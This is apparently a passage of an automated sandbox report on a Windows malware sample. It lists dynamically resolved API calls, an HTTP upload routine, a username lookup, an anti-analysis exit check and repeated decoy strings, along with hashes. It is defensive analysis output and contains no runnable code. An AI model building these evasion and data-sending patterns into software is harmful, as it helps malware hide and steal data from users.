                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 2127927946-2218711628
                                    • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                    • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                    • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                    • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                    Control-flow Graph

                                    control_flow_graph 752 419860-419874 call 419750 755 419a93-419af2 LoadLibraryA * 5 752->755 756 41987a-419a8e call 419780 GetProcAddress * 21 752->756 757 419af4-419b08 GetProcAddress 755->757 758 419b0d-419b14 755->758 756->755 757->758 760 419b46-419b4d 758->760 761 419b16-419b41 GetProcAddress * 2 758->761 763 419b68-419b6f 760->763 764 419b4f-419b63 GetProcAddress 760->764 761->760 765 419b71-419b84 GetProcAddress 763->765 766 419b89-419b90 763->766 764->763 765->766 767 419bc1-419bc2 766->767 768 419b92-419bbc GetProcAddress * 2 766->768 768->767
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,009E7E58), ref: 004198A1
                                    • GetProcAddress.KERNEL32(75900000,009E7E70), ref: 004198BA
                                    • GetProcAddress.KERNEL32(75900000,009E7EE8), ref: 004198D2
                                    • GetProcAddress.KERNEL32(75900000,009E7EB8), ref: 004198EA
                                    • GetProcAddress.KERNEL32(75900000,009E7ED0), ref: 00419903
                                    • GetProcAddress.KERNEL32(75900000,009E4F10), ref: 0041991B
                                    • GetProcAddress.KERNEL32(75900000,009E45A8), ref: 00419933
                                    • GetProcAddress.KERNEL32(75900000,009E45E8), ref: 0041994C
                                    • GetProcAddress.KERNEL32(75900000,009E7F00), ref: 00419964
                                    • GetProcAddress.KERNEL32(75900000,009E7F18), ref: 0041997C
                                    • GetProcAddress.KERNEL32(75900000,00A12950), ref: 00419995
                                    • GetProcAddress.KERNEL32(75900000,00A12B90), ref: 004199AD
                                    • GetProcAddress.KERNEL32(75900000,009E42C8), ref: 004199C5
                                    • GetProcAddress.KERNEL32(75900000,00A12A70), ref: 004199DE
                                    • GetProcAddress.KERNEL32(75900000,00A12A40), ref: 004199F6
                                    • GetProcAddress.KERNEL32(75900000,009E43A8), ref: 00419A0E
                                    • GetProcAddress.KERNEL32(75900000,00A12AA0), ref: 00419A27
                                    • GetProcAddress.KERNEL32(75900000,00A12BF0), ref: 00419A3F
                                    • GetProcAddress.KERNEL32(75900000,009E4468), ref: 00419A57
                                    • GetProcAddress.KERNEL32(75900000,00A12938), ref: 00419A70
                                    • GetProcAddress.KERNEL32(75900000,009E43C8), ref: 00419A88
                                    • LoadLibraryA.KERNEL32(00A12B78,?,00416A00), ref: 00419A9A
                                    • LoadLibraryA.KERNEL32(00A12B48,?,00416A00), ref: 00419AAB
                                    • LoadLibraryA.KERNEL32(00A12A58,?,00416A00), ref: 00419ABD
                                    • LoadLibraryA.KERNEL32(00A12BA8,?,00416A00), ref: 00419ACF
                                    • LoadLibraryA.KERNEL32(00A12AB8,?,00416A00), ref: 00419AE0
                                    • GetProcAddress.KERNEL32(75070000,00A12BC0), ref: 00419B02
                                    • GetProcAddress.KERNEL32(75FD0000,00A12A10), ref: 00419B23
                                    • GetProcAddress.KERNEL32(75FD0000,00A12920), ref: 00419B3B
                                    • GetProcAddress.KERNEL32(75A50000,00A12A88), ref: 00419B5D
                                    • GetProcAddress.KERNEL32(74E50000,009E46A8), ref: 00419B7E
                                    • GetProcAddress.KERNEL32(76E80000,009E4F40), ref: 00419B9F
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00419BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                    • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                    • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                    Control-flow Graph

                                    control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                    • StrCmpCA.SHLWAPI(?,00A1B398), ref: 0040493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,00A1B228), ref: 00404DE8
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                    • HttpOpenRequestA.WININET(00000000,00A1B218,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00404B15
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 2402878923-2180234286
                                    • Opcode ID: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                    • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                    • Opcode Fuzzy Hash: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                    • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: Heap$AllocNameProcessUser
                                    • String ID:
                                    • API String ID: 1206570057-0
                                    • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                    • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                    • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                    • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                    APIs
                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                    • ExitProcess.KERNEL32 ref: 0040117E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                    • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                    • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                    • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                    Control-flow Graph

                                    control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,009E44C8), ref: 00419C2D
                                    • GetProcAddress.KERNEL32(75900000,009E4348), ref: 00419C45
                                    • GetProcAddress.KERNEL32(75900000,00A12C80), ref: 00419C5E
                                    • GetProcAddress.KERNEL32(75900000,00A12C08), ref: 00419C76
                                    • GetProcAddress.KERNEL32(75900000,00A12C50), ref: 00419C8E
                                    • GetProcAddress.KERNEL32(75900000,00A12C98), ref: 00419CA7
                                    • GetProcAddress.KERNEL32(75900000,00A15080), ref: 00419CBF
                                    • GetProcAddress.KERNEL32(75900000,00A12CC8), ref: 00419CD7
                                    • GetProcAddress.KERNEL32(75900000,00A12CB0), ref: 00419CF0
                                    • GetProcAddress.KERNEL32(75900000,00A12C20), ref: 00419D08
                                    • GetProcAddress.KERNEL32(75900000,00A12C38), ref: 00419D20
                                    • GetProcAddress.KERNEL32(75900000,009E44E8), ref: 00419D39
                                    • GetProcAddress.KERNEL32(75900000,009E4548), ref: 00419D51
                                    • GetProcAddress.KERNEL32(75900000,009E4368), ref: 00419D69
                                    • GetProcAddress.KERNEL32(75900000,009E4568), ref: 00419D82
                                    • GetProcAddress.KERNEL32(75900000,00A190E8), ref: 00419D9A
                                    • GetProcAddress.KERNEL32(75900000,00A19100), ref: 00419DB2
                                    • GetProcAddress.KERNEL32(75900000,00A150F8), ref: 00419DCB
                                    • GetProcAddress.KERNEL32(75900000,009E4588), ref: 00419DE3
                                    • GetProcAddress.KERNEL32(75900000,00A19118), ref: 00419DFB
                                    • GetProcAddress.KERNEL32(75900000,00A19160), ref: 00419E14
                                    • GetProcAddress.KERNEL32(75900000,00A19178), ref: 00419E2C
                                    • GetProcAddress.KERNEL32(75900000,00A19130), ref: 00419E44
                                    • GetProcAddress.KERNEL32(75900000,009E4628), ref: 00419E5D
                                    • GetProcAddress.KERNEL32(75900000,00A19148), ref: 00419E75
                                    • GetProcAddress.KERNEL32(75900000,00A190D0), ref: 00419E8D
                                    • GetProcAddress.KERNEL32(75900000,00A19190), ref: 00419EA6
                                    • GetProcAddress.KERNEL32(75900000,00A18E90), ref: 00419EBE
                                    • GetProcAddress.KERNEL32(75900000,00A18E18), ref: 00419ED6
                                    • GetProcAddress.KERNEL32(75900000,00A19058), ref: 00419EEF
                                    • GetProcAddress.KERNEL32(75900000,00A18DD0), ref: 00419F07
                                    • GetProcAddress.KERNEL32(75900000,00A18F38), ref: 00419F1F
                                    • GetProcAddress.KERNEL32(75900000,00A18F08), ref: 00419F38
                                    • GetProcAddress.KERNEL32(75900000,00A14988), ref: 00419F50
                                    • GetProcAddress.KERNEL32(75900000,00A18F68), ref: 00419F68
                                    • GetProcAddress.KERNEL32(75900000,00A190B8), ref: 00419F81
                                    • GetProcAddress.KERNEL32(75900000,009E4648), ref: 00419F99
                                    • GetProcAddress.KERNEL32(75900000,00A18E00), ref: 00419FB1
                                    • GetProcAddress.KERNEL32(75900000,009E4668), ref: 00419FCA
                                    • GetProcAddress.KERNEL32(75900000,00A19040), ref: 00419FE2
                                    • GetProcAddress.KERNEL32(75900000,00A19010), ref: 00419FFA
                                    • GetProcAddress.KERNEL32(75900000,009E4688), ref: 0041A013
                                    • GetProcAddress.KERNEL32(75900000,009E42E8), ref: 0041A02B
                                    • LoadLibraryA.KERNEL32(00A18F80,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                    • LoadLibraryA.KERNEL32(00A19088,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                    • LoadLibraryA.KERNEL32(00A18ED8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                    • LoadLibraryA.KERNEL32(00A18DE8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                    • LoadLibraryA.KERNEL32(00A18F50,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                    • LoadLibraryA.KERNEL32(00A19070,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                    • LoadLibraryA.KERNEL32(00A18FE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                    • LoadLibraryA.KERNEL32(00A18FF8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                    • GetProcAddress.KERNEL32(75FD0000,009E4308), ref: 0041A0DA
                                    • GetProcAddress.KERNEL32(75FD0000,00A18EA8), ref: 0041A0F2
                                    • GetProcAddress.KERNEL32(75FD0000,00A12D40), ref: 0041A10A
                                    • GetProcAddress.KERNEL32(75FD0000,00A18E48), ref: 0041A123
                                    • GetProcAddress.KERNEL32(75FD0000,009E48A8), ref: 0041A13B
                                    • GetProcAddress.KERNEL32(735A0000,00A14FE0), ref: 0041A160
                                    • GetProcAddress.KERNEL32(735A0000,009E4868), ref: 0041A179
                                    • GetProcAddress.KERNEL32(735A0000,00A14D10), ref: 0041A191
                                    • GetProcAddress.KERNEL32(735A0000,00A18E30), ref: 0041A1A9
                                    • GetProcAddress.KERNEL32(735A0000,00A18EF0), ref: 0041A1C2
                                    • GetProcAddress.KERNEL32(735A0000,009E49E8), ref: 0041A1DA
                                    • GetProcAddress.KERNEL32(735A0000,009E49C8), ref: 0041A1F2
                                    • GetProcAddress.KERNEL32(735A0000,00A18E60), ref: 0041A20B
                                    • GetProcAddress.KERNEL32(763B0000,009E4A28), ref: 0041A22C
                                    • GetProcAddress.KERNEL32(763B0000,009E47E8), ref: 0041A244
                                    • GetProcAddress.KERNEL32(763B0000,00A18FC8), ref: 0041A25D
                                    • GetProcAddress.KERNEL32(763B0000,00A18F98), ref: 0041A275
                                    • GetProcAddress.KERNEL32(763B0000,009E4768), ref: 0041A28D
                                    • GetProcAddress.KERNEL32(750F0000,00A14F68), ref: 0041A2B3
                                    • GetProcAddress.KERNEL32(750F0000,00A14E50), ref: 0041A2CB
                                    • GetProcAddress.KERNEL32(750F0000,00A18F20), ref: 0041A2E3
                                    • GetProcAddress.KERNEL32(750F0000,009E4A48), ref: 0041A2FC
                                    • GetProcAddress.KERNEL32(750F0000,009E4988), ref: 0041A314
                                    • GetProcAddress.KERNEL32(750F0000,00A14CC0), ref: 0041A32C
                                    • GetProcAddress.KERNEL32(75A50000,00A18E78), ref: 0041A352
                                    • GetProcAddress.KERNEL32(75A50000,009E4828), ref: 0041A36A
                                    • GetProcAddress.KERNEL32(75A50000,00A12DD0), ref: 0041A382
                                    • GetProcAddress.KERNEL32(75A50000,00A18FB0), ref: 0041A39B
                                    • GetProcAddress.KERNEL32(75A50000,00A19028), ref: 0041A3B3
                                    • GetProcAddress.KERNEL32(75A50000,009E4848), ref: 0041A3CB
                                    • GetProcAddress.KERNEL32(75A50000,009E4808), ref: 0041A3E4
                                    • GetProcAddress.KERNEL32(75A50000,00A190A0), ref: 0041A3FC
                                    • GetProcAddress.KERNEL32(75A50000,00A18EC0), ref: 0041A414
                                    • GetProcAddress.KERNEL32(75070000,009E49A8), ref: 0041A436
                                    • GetProcAddress.KERNEL32(75070000,00A19598), ref: 0041A44E
                                    • GetProcAddress.KERNEL32(75070000,00A195C8), ref: 0041A466
                                    • GetProcAddress.KERNEL32(75070000,00A197A8), ref: 0041A47F
                                    • GetProcAddress.KERNEL32(75070000,00A195E0), ref: 0041A497
                                    • GetProcAddress.KERNEL32(74E50000,009E4968), ref: 0041A4B8
                                    • GetProcAddress.KERNEL32(74E50000,009E4A08), ref: 0041A4D1
                                    • GetProcAddress.KERNEL32(75320000,009E4A68), ref: 0041A4F2
                                    • GetProcAddress.KERNEL32(75320000,00A194D8), ref: 0041A50A
                                    • GetProcAddress.KERNEL32(6F060000,009E47A8), ref: 0041A530
                                    • GetProcAddress.KERNEL32(6F060000,009E4888), ref: 0041A548
                                    • GetProcAddress.KERNEL32(6F060000,009E48C8), ref: 0041A560
                                    • GetProcAddress.KERNEL32(6F060000,00A19640), ref: 0041A579
                                    • GetProcAddress.KERNEL32(6F060000,009E47C8), ref: 0041A591
                                    • GetProcAddress.KERNEL32(6F060000,009E46E8), ref: 0041A5A9
                                    • GetProcAddress.KERNEL32(6F060000,009E4748), ref: 0041A5C2
                                    • GetProcAddress.KERNEL32(6F060000,009E48E8), ref: 0041A5DA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                    • GetProcAddress.KERNEL32(74E00000,00A194F0), ref: 0041A629
                                    • GetProcAddress.KERNEL32(74E00000,00A12D50), ref: 0041A641
                                    • GetProcAddress.KERNEL32(74E00000,00A19580), ref: 0041A659
                                    • GetProcAddress.KERNEL32(74E00000,00A196E8), ref: 0041A672
                                    • GetProcAddress.KERNEL32(74DF0000,009E46C8), ref: 0041A693
                                    • GetProcAddress.KERNEL32(6F9B0000,00A19550), ref: 0041A6B4
                                    • GetProcAddress.KERNEL32(6F9B0000,009E4708), ref: 0041A6CD
                                    • GetProcAddress.KERNEL32(6F9B0000,00A19610), ref: 0041A6E5
                                    • GetProcAddress.KERNEL32(6F9B0000,00A19508), ref: 0041A6FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
